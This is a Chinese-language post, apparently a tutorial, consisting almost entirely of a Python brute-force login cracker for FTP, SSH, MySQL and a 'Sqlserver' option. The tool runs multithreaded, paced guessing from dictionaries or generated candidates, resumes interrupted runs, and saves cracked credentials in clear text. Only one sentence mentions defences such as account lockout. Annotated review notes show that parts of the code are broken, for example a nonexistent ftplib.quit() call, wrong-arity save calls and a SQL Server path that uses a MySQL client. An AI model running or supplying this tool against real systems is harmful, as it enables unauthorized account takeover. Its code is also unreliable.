Python 开发一个帐号密码暴力破解程序

支持FTP、MySQL、SSH、Sqlserver协议
功能:每次破解可以设置时间间隔;破解中断后,下次运行可以读取历史记录,从上一次的位置继续。支持多线程,可自行设置线程数。从防守方看,这类逐个尝试登录的流量会在目标服务上留下大量连续的失败认证记录,帐号锁定、登录限速和失败登录告警都是针对它的常规措施。
上代码:

"""
python3暴力穷举密码
"""
import threading
import time
import os
from time import strftime
from itertools import product
from time import sleep
from tqdm import tqdm
import requests
from requests import post
import pymysql  # 导入连接数据库的模块
import ftplib
import logging
import logging.config
from pexpect import pxssh
import optparse
import pymysql
import httpauth
import MySQLdb

# Path of the results file; main() assigns it from user input and data_save() appends to it.
PATHSAVE = ""


# Password candidate generator
def psgens_auto(x=8):
    """Lazily yield every string of length ``x`` built from one character class.

    The classes are visited in a fixed order: digits (in the order
    '8921345670'), then lowercase letters, then uppercase letters. A
    candidate never mixes classes, so the generator covers
    10**x + 2 * 26**x strings and no mixed-class or punctuated value.

    Args:
        x: length of every candidate (default 8).

    Yields:
        str: the next candidate.
    """
    charsets = (
        '8921345670',
        'abcdefghijklmnopqrstuvwxyz',
        'ABCDEFGHIJKLMNOPQRSTUVWXYZ',
    )
    for alphabet in charsets:
        # product() enumerates the tuples lazily; nothing is materialised up front.
        yield from map(''.join, product(alphabet, repeat=x))


def users_auto(x=4):
    """Lazily yield every account-name candidate of length ``x``.

    Candidates are drawn from one character class at a time, in this order:
    lowercase letters, uppercase letters, digits ('8921345670'). Classes are
    never combined inside one candidate.

    Args:
        x: length of every candidate (default 4).

    Yields:
        str: the next candidate.
    """
    lower = 'abcdefghijklmnopqrstuvwxyz'
    upper = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    digits = '8921345670'

    for pool in (lower, upper, digits):
        for combo in product(pool, repeat=x):
            yield ''.join(combo)


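def data_save(type, user, passwd):
    """Append one timestamped result record to the file named by PATHSAVE.

    The record contains the account name and password in clear text, so the
    results file is itself sensitive material wherever it ends up on disk.

    Args:
        type: protocol label written into the record (the name shadows the
            builtin; it is kept because callers pass it positionally).
        user: account name to record.
        passwd: password to record.
    """
    timeDate = time.strftime('%Y-%m-%d %H:%M:%S')
    data = '时间:%s 破解成功的 协议:%s 帐号:%s 密码:%s \n' % (timeDate, type, user, passwd)
    # The context manager closes the handle even if the write raises; the
    # original left it open on that path.
    with open(PATHSAVE, 'a') as fileSave:
        fileSave.write(data)
    print('己成功存入文件:{0}'.format(data))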


def connect_ftp(user, passwd, target_ip):
    """Try one FTP login with the given pair and report the outcome.

    Each call opens a new control connection (2 s timeout) and issues a
    single login, i.e. one authentication attempt per call as seen from the
    server. The connection object is not closed afterwards.

    Args:
        user: account name to try.
        passwd: password to try.
        target_ip: host passed to ftplib.FTP.
    """
    try:
        session = ftplib.FTP(target_ip, timeout=2)
        session.login(user, passwd)
    except Exception:
        # Every error - refused connection, timeout, rejected login - is
        # reported the same way, as a failed attempt.
        print("破解失败 帐号:{0} 密码:{1}".format(user, passwd))
        return

    print("****************破解成功*******************\n")
    print("帐号:{0} 密码:{1}".format(user, passwd))
    data_save("FTP", user, passwd)


def connect_ssh(user, passwd, target_ip):
    """Try one SSH login through pexpect's pxssh and report the outcome.

    Args:
        user: account name to try.
        passwd: password to try.
        target_ip: host passed to pxssh.login().
    """
    try:
        pass
        s = pxssh.pxssh()
        s.login(target_ip, user, passwd)
    except Exception as e:
        # `e` is never inspected: any error from the login is printed as a
        # failed attempt.
        print("破解失败 帐号:{0} 密码:{1}".format(user, passwd))
    else:
        print("****************破解成功*******************\n")
        print("帐号:{0} 密码:{1}".format(user, passwd))
        # NOTE(review): ftplib is the FTP module and exposes no module-level
        # quit(), and data_save() is defined with three parameters but gets
        # two here, so this branch raises instead of recording the result.
        # The pxssh session `s` is not logged out.
        ftplib.quit()
        data_save(user, passwd)


def connect_mysql(user, passwd, target_ip, db):
    """Try one MySQL login with the given pair and report the outcome.

    Args:
        user: account name to try.
        passwd: password to try.
        target_ip: database server address.
        db: database name to select on connect.
    """
    settings = dict(
        host=target_ip,   # server address
        user=user,        # account name
        passwd=passwd,    # database password
        db=db,            # database name
        charset='utf8',
    )
    try:
        handle = MySQLdb.connect(**settings)
    except Exception:
        # Any connection error, not only a rejected password, lands here.
        print("破解失败: 帐号:{0} 密码:{1}".format(user, passwd))
        return

    print("****************破解成功*******************")
    print("破解成功: 帐号:{0} 密码:{1}".format(user, passwd))
    handle.close()
    data_save("mysql", user, passwd)


def connect_sqlserver(user, passwd, serverName, db):
    """Try one database login against ``serverName`` and report the outcome.

    NOTE(review): the connection is made with pymysql, which is a MySQL
    client library, so despite the function name this is a second MySQL
    login path rather than a SQL Server one.

    Args:
        user: account name to try.
        passwd: password to try.
        serverName: first positional argument given to pymysql.connect().
        db: fourth positional argument given to pymysql.connect().
    """
    try:
        connect = pymysql.connect(serverName, user, passwd, db)
    except Exception as e:
        # `e` is never inspected: every error is printed as a failed attempt.
        print("破解失败 帐号:{0} 密码:{1}".format(user, passwd))
    else:
        print("****************破解成功*******************")
        print("帐号:{0} 密码:{1}".format(user, passwd))
        # NOTE(review): data_save() is defined with three parameters
        # (protocol label, user, password) but receives two here, so this
        # call raises TypeError. `connect` is never closed.
        data_save(user, passwd)


def Thread_funtion(user, passwd, target_ip, select, optionA, optionB):
    """Thread target: route one credential pair to the chosen protocol handler.

    Args:
        user: account name to try.
        passwd: password to try.
        target_ip: host used by the FTP, SSH and MySQL handlers.
        select: protocol number (1 FTP, 2 SSH, 3 MySQL, 4 "Sqlserver");
            any other value does nothing.
        optionA: database name, used for select 3 and 4.
        optionB: server name, used for select 4 only (target_ip is ignored there).
    """
    if select == 1:
        connect_ftp(user, passwd, target_ip)
        return
    if select == 2:
        connect_ssh(user, passwd, target_ip)
        return
    if select == 3:
        connect_mysql(user, passwd, target_ip, optionA)
        return
    if select == 4:
        connect_sqlserver(user, passwd, optionB, optionA)


def main():
    """Interactive console driver for the login-guessing run.

    Flow, as written:
      1. choose the candidate source (1 = dictionary files, 2 = built-in
         generators);
      2. loop over the settings menu (thread count, pause length, target
         address, resume-from-history) until any other number is entered;
      3. choose the protocol, which Thread_funtion() maps to a connect_*
         function;
      4. prompt for the results file and, depending on the choices, the
         database / server name, dictionary paths or candidate lengths, and
         the two history files;
      5. walk user x password, starting one thread per pair, then join.

    Menu selections are read with int(input(...)) outside the try block, so
    non-numeric input raises ValueError out of main().
    """
    global PATHSAVE
    threads = []  # thread list; joined at the bottom of the outer loop
    threadsNum = 1  # attempts started between two pauses
    timeInterval = 0  # pause length in seconds
    flag = True  # shared loop sentinel, reset after each prompt loop
    target_ip = 'localhost'  # 127.0.0.1
    option = ""
    records = 'Y'  # 'Y' = resume from the history files, 'N' = start over
    flagRecord = 1  # 1 = start attempts; 0 = skip pairs until the saved pair is reached
    sum = 0  # attempts since the last pause (shadows the builtin inside main)

    while (flag):
        print(">>>**************************************")
        print(">>>*        请选择暴力破解方式             *")
        print(">>>*            1.字典破解(推荐)          *")
        print(">>>*            2.自动生成器              *")
        print(">>>**************************************")
        selecttp = int(input(">>>请选择功能:"))

        # Settings menu: repeats until a choice other than 1-4 is entered.
        while (flag):
            print(">>>**************************************")
            print(">>>*             参数设置                *")
            print(">>>*       1.线程数量(默认为1)            *")
            print(">>>*       2.每次破解间隔时间(默认为0s)    *")
            print(">>>*       3.目标机地址(默认为本机)        *")
            print(">>>*       4.历史破解记录(默认读档继续)     *")
            print(">>>*       0.参数设置完成退出              *")
            print(">>>*      *提示:(设置后保存至程序结束)      *")
            print(">>>**************************************")
            selectParameter = int(input(">>>请选择功能:"))
            if selectParameter == 1:
                threadsNum = int(input(">>>请输入线程数量:"))
            elif selectParameter == 2:
                timeInterval = int(input(">>>请输入破解间隔时间:"))
            elif selectParameter == 3:
                # NOTE(review): the entered address is converted with int().
                target_ip = int(input(">>>请输入目标机地址:"))
            elif selectParameter == 4:
                print(">>>**************************************")
                print(">>>*         历史破解记录                 *")
                print(">>>*          1.从新开始                  *")
                print(">>>*          2.读档继续                  *")
                print(">>>**************************************")
                selectHistorify = int(input(">>>请选择功能:"))
                if selectHistorify == 1:
                    records = 'N'
                else:
                    records = 'Y'
            else:
                flag = False
        flag = True

        print(">>>**************************************")
        print(">>>*        请选择协议类型                 *")
        print(">>>*            1.FTP                   *")
        print(">>>*            2.SSH                   *")
        print(">>>*            3.Mysql                 *")
        print(">>>*            4.Sqlserver             *")
        print(">>>*            0.退出                  *")
        print(">>>**************************************")
        select = int(input(">>>请选择功能:"))

        # The menu lists 0-4, but only values above 6 or below 0 are rejected;
        # 5 and 6 pass and match no branch in Thread_funtion().
        if select > 6:
            print("选择错误,请重新选择")
            continue
        elif select < 0:
            print("选择错误,请重新选择")
            continue

        if select != 0:
            print("*********************开始破解******************\n")
            try:
                # The results file must already exist; the prompt repeats until it does.
                while (flag):
                    PATHSAVE = input(">>>请输入破解成功数据存放的文件路径:")

                    if os.path.exists(PATHSAVE):
                        flag = False
                    else:
                        print("帐户文件路径不存在请重新输入")

                # NOTE(review): optionA / optionB are assigned only for
                # protocols 3 and 4, while the Thread(...) calls below
                # reference both for every protocol.
                if select == 3:
                    optionA = input(">>>请指定数据库:")
                elif select == 4:
                    optionA = input(">>>请指定数据库:")
                    optionB = input(">>>请指定服务器名字:")

                flag = True

                if selecttp == 1:  # ask for the dictionary file paths
                    while (flag):
                        pathPasswd = input(">>>请输入密码字典文件路径:")
                        pathUser = input(">>>请输入帐户字典文件路径:")

                        # `&` is the bitwise operator applied to two bools here.
                        if os.path.exists(pathPasswd) & os.path.exists(pathUser):
                            # Accounts keep every line; Read_num() keeps only all-digit lines.
                            userList = Read_str(pathUser)
                            passwdList = Read_num(pathPasswd)
                            flag = False
                        elif os.path.exists(pathPasswd):
                            print("帐户字典文件路径不存在请重新输入")
                        elif os.path.exists(pathUser):
                            print("密码字典文件路径不存在请重新输入")
                        else:
                            print("帐户和密码字典文件路径都不存在请重新输入")
                    flag = True
                elif selecttp == 2:
                    user_num = int(input(">>>请输入帐户位数:"))
                    passwd_num = int(input(">>>请输入密码位数:"))
                else:
                    flag = False
                    selecttp = 0
                    print("选择错误,请重新选择")

                # Resume support: read the first line of each history file as the saved pair.
                if records == 'Y':
                    flagRecord = 0
                    while (flag):
                        pathPasswdOne = input(">>>请输入存储历史密码文件路径:")
                        pathUserOne = input(">>>请输入存储历史帐户文件路径:")

                        if os.path.exists(pathPasswdOne) & os.path.exists(pathUserOne):
                            # These two handles are not closed anywhere in main().
                            fileUserHistorify = open(pathUserOne, 'r')
                            filePasswdHistorify = open(pathPasswdOne, 'r')
                            UserHistorify = fileUserHistorify.readline()
                            PasswdHistorify = filePasswdHistorify.readline()

                            # NOTE(review): `records == 'N'` is a comparison whose
                            # result is discarded; only flagRecord changes here.
                            if len(UserHistorify) == 0:
                                records == 'N'
                                flagRecord = 1
                            elif len(PasswdHistorify) == 0:
                                records == 'N'
                                flagRecord = 1
                            flag = False
                        # NOTE(review): these branches test the dictionary paths
                        # (pathPasswd / pathUser), not the history paths just entered.
                        elif os.path.exists(pathPasswd):
                            print("帐户文件路径不存在请重新输入")
                        elif os.path.exists(pathUser):
                            print("密码文件路径不存在请重新输入")
                        else:
                            print("帐户和密码文件路径都不存在请重新输入")
                flag = True

                if selecttp == 1:  # user-supplied dictionaries
                    for user in userList:
                        for passwd in passwdList:
                            # Pacing: after threadsNum started attempts, pause
                            # timeInterval seconds, so attempts leave in bursts.
                            if (sum == threadsNum):
                                sleep(timeInterval)
                                sum = 0
                            # Resume: attempts begin once the saved pair is reached.
                            if records == 'Y':
                                if user == UserHistorify:
                                    if passwd == PasswdHistorify:
                                        flagRecord = 1

                            if flagRecord == 1:
                                # Record the pair about to be tried, then start its thread.
                                write_str(pathUserOne, pathPasswdOne, user, passwd)
                                thread_x = threading.Thread(target=Thread_funtion, args=(
                                str(user), str(passwd), target_ip, select, optionA, optionB))  # create the new thread
                                threads.append(thread_x)  # add the thread to the thread list
                                thread_x.start()  # start the thread; it runs threading.Thread.run
                                sum = sum + 1
                else:  # built-in generators
                    for user in tqdm(users_auto(user_num)):
                        for passwd in tqdm(psgens_auto(passwd_num)):
                            if (sum == threadsNum):
                                sleep(timeInterval)
                                sum = 0
                            # NOTE(review): unlike the dictionary branch, the
                            # history names are used without checking `records`,
                            # and the flagRecord test is nested under this `if`.
                            if user == UserHistorify:
                                if passwd == PasswdHistorify:
                                    flagRecord = 1

                                if flagRecord == 1:
                                    write_str(pathUserOne, pathPasswdOne, user, passwd)
                                    thread_x = threading.Thread(target=Thread_funtion, args=(
                                    str(user), str(passwd), target_ip, select, optionA, optionB))  # create the new thread
                                    threads.append(thread_x)  # add the thread to the thread list
                                    thread_x.start()
                                    sum = sum + 1
                # Run finished: clear both history files. The arguments are in
                # (password, user) order; both files are emptied either way.
                if records == 'Y':
                    fileTruncate(pathPasswdOne, pathUserOne)

            except Exception as e:
                # Any error in the block above is printed and the run moves on to the join.
                print("error:", e)

        else:
            # Protocol choice 0: leave the outer loop after the join below.
            flag = False

        for t in threads:  # wait for all threads to finish
            t.join()
        print("*********************破解结束******************\n")


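def fileTruncate(pathUserOne, pathPasswdOne):
    """Empty both history files, creating them if they do not exist.

    Args:
        pathUserOne: path of the saved-account file.
        pathPasswdOne: path of the saved-password file.
    """
    for path in (pathUserOne, pathPasswdOne):
        # Mode 'w' already truncates on open, so no explicit truncate() is
        # needed; the context manager closes each handle even if a later
        # open fails, which the original did not guarantee.
        with open(path, 'w'):
            pass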


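def write_str(pathUserOne, pathPasswdOne, user, passwd):
    """Overwrite the two history files with one account / password pair.

    Both files are opened in 'w' mode, so each call replaces the previous
    content and only the most recent pair is kept, in clear text.

    Args:
        pathUserOne: path of the saved-account file.
        pathPasswdOne: path of the saved-password file.
        user: account name to store.
        passwd: password to store.
    """
    # One `with` for both handles: each is closed even if a write raises,
    # which the original open()/close() pairs did not guarantee.
    with open(pathUserOne, 'w') as fileUser, open(pathPasswdOne, 'w') as filePasswd:
        fileUser.write(user)
        filePasswd.write(passwd)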


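def Read_num(rootdir, flag=0):
    """Return the all-digit lines of a text file, in file order.

    Only lines for which str.isdigit() is true are kept; blank lines and
    lines containing any letter, space or punctuation are dropped.

    Args:
        rootdir: path of the file to read (a file, despite the name).
        flag: unused; kept so existing calls that pass it keep working.

    Returns:
        list[str]: the numeric lines; empty when the file is empty or has none.
    """
    # The original re-read an empty file recursively and discarded the
    # result, then closed the handle a second time after the `with`; both
    # were no-ops and are dropped.
    with open(rootdir, 'r') as file:
        txt = file.read()
    return [line for line in txt.split('\n') if line.isdigit()]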


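def Read_str(rootdir, flag=0):
    """Return every line of a text file with its newline removed.

    Blank lines are kept as empty strings; no other filtering is applied.

    Args:
        rootdir: path of the file to read (a file, despite the name).
        flag: unused; kept so existing calls that pass it keep working.

    Returns:
        list[str]: the lines in file order; empty for an empty file.
    """
    # The original called Read_num() on an empty file and discarded the
    # result, then closed the handle again after the `with`; both were
    # no-ops and are dropped.
    with open(rootdir, 'r') as file:
        return [line.strip('\n') for line in file]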


# Start the interactive menu only when the file is executed as a script.
if __name__ == "__main__":
    main()
